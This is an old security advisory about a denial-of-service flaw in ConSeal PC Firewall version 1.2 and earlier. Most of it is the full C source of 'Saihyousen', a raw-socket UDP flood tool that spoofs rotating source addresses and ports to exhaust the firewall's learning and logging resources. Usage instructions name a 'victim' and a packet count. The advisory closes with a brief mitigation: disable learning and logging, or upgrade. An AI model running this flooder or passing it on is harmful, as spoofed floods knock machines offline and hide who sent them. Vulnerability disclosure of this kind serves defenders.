COMMAND
ConSeal PC Firewall
SYSTEMS AFFECTED
Systems (x86 based) with ConSeal PC Firewall (predate June 1998)
PROBLEM
Max Schau found following. This is a pretty easy DoS against
ConSeal PC Firewall. It only works on the versions that predate
June 1998 which is version 1.2 or less. But all the little warez
pups out there still have the older versions that this works
against. This is nothing too special, but a flat out flood
didn't work, Max had to throw in some stuff to change the IPs and
he found it froze the machine faster if the ports also changed.
Saihyousen causes Conseal to eat up ALL of the available resources
and can result in a very messy reboot if the attack continues for
about 10-30 seconds after the machine froze.
/* Saihyousen Attack (*Japanese* Ice Breaker), By Noc-Wage (M.C.S.R)
* Base code from arnudp.c but HEAVILY modified. Originally written
* sometime early April 1998, I'm a little fuzzy as to the date.
*
* I take no responsibility for the actions of any script kiddies who
* think that running this against some one is a fun way to pass away
* their useless lives. I also in NO WAY claim to be good at
* programming, so modify it all you want, just leave credit to me
* and PLEASE send me a copy of your modified code.
*
* HOW IT WORKS:
* The way this program kills the machine happens in 2 ways
* #1 If Conseal is set for "learning" mode the flooding packets from
* all the different IPs and ports will cause the program to continously
* attempt to write more and more new rules. This eventually uses up
* all the resources and results in a freeze and eventually a reboot.
* #2 If ConSeal is set to log attacks, once again because of the number
* of packets the system resources are eaten up and the machine dies.
*
* I tested dx2/66 running RedHat 4.0 (12 megs of ram)
* as the attacker and a Pentium 233 (64 megs of ram)
* as the victim. Using ConSeal The pentium 233 froze after about 5
* seconds of attack. (This is on an ethernet, but I had done live testing
* over ppp connection (33.6/28.8) and it took only few more seconds.
* Because the packets are so small a 28.8 dial-up would not get lag at
* all, 14.4 would get minor after about 20,000 packets. So send as many
* as you want, generally 40,000 will kill anything.
*/
/* Should compile on all linux, not too sure about BSD, if you modify it to make
* it better in some way please mail it too me, I'd be interested in seeing it.
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <errno.h>
#include <strings.h>
#include <netdb.h>
#include <stdlib.h>
#include <stdio.h>
#ifdef BROKEN_LIBC
#include <arpa/inet.h>
#else
#define u_char unsigned char
#define u_short unsigned short
#endif
struct sockaddr sa;
int main(int argc,char **argv)
{
int fd;
int x=1;
int hosti=192;
int hostii=168;
int hostiii=1;
int meep=0;
int fooport=1;
int numpack=0;
char funhost[15];
struct sockaddr_in *p;
struct hostent *he;
u_char gram[36]=
{
0x45, 0x00, 0x00, 0x26,
0x12, 0x34, 0x00, 0x00,
0xFF, 0x11, 0, 0,
0, 0, 0, 0,
0, 0, 0, 0,
0, 0, 0, 0,
0x00, 0x12, 0x00, 0x00,
'3','1','3','3','7','8','9','0'
};
if(argc!=3)
{
fprintf(stderr,"Saihyousen, by Noc-Wage\n");
fprintf(stderr,"The faster your connection to the internet is (latency
wise, not bandwidth)\n");
fprintf(stderr,"and the lower the CPU speed of the victim
will\nincrease probability of success\n");
fprintf(stderr,"usage: %s victim num_of_packets Ex: saihyousen
127.0.0.1 40000\n",*argv);
exit(1);
};
if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1)
{
perror("requires RAW SOCKETS");
exit(1);
};
#ifdef IP_HDRINCL
if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
{
perror("setsockopt IP_HDRINCL");
exit(1);
};
#else
fprintf(stderr,"we don't have IP_HDRINCL :-(\n\n");
#endif
/* The stuff below is so that it's not fully sequential i.e
100.100.100.101, 100.100.100.102 */
for (numpack=0;numpack<=atoi(argv[2]);numpack++) {
if (meep==0) { ++hosti; meep++; }
if (hosti>254) hosti=1;
if (meep==1) { ++hostii; meep++;}
if (hostii>254) hostii=1;
if (meep==2) { ++hostiii; meep=0;}
if (hostiii>254) hostiii=1;
sprintf( funhost, "%i.%i.%i.%i",hosti,hostii,hostiii,hosti);
(he=gethostbyname(funhost));
bcopy(*(he->h_addr_list),(gram+12),4);
if((he=gethostbyname(argv[1]))==NULL)
{
fprintf(stderr,"can't resolve destination hostname\n");
exit(1);
};
bcopy(*(he->h_addr_list),(gram+16),4);
fooport++;
/* resets the port to 1 if it's nearing the end of possible values */
if (fooport>65530) {fooport=1;};
*(u_short*)(gram+20)=htons((u_short)fooport);
*(u_short*)(gram+22)=htons((u_short)fooport);
p=(struct sockaddr_in*)&sa;
p->sin_family=AF_INET;
bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr));
if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct
sockaddr)))== -1)
{
perror("sendto");
exit(1);
};
/* printf("Packet # %i\n", numpack); */
/* Turn that on to see where you are.. it'll slow the attack though */
};
printf("Attack against %s finished", argv[1]);
putchar('\n');
return 1;
}
SOLUTION
Well it's fairly simple, disable learning and logging mode.
Signal9 has been made aware of this problem LONG before Max
decided to release it, so people who actually paid for it and
keep their copy updated should have no problems. Those of you
out there who used a crack or a key generator are probably the
type that sit on IRC warez channels all day. www.signal9.com you
can download and upgrade the exsisting copy that you own.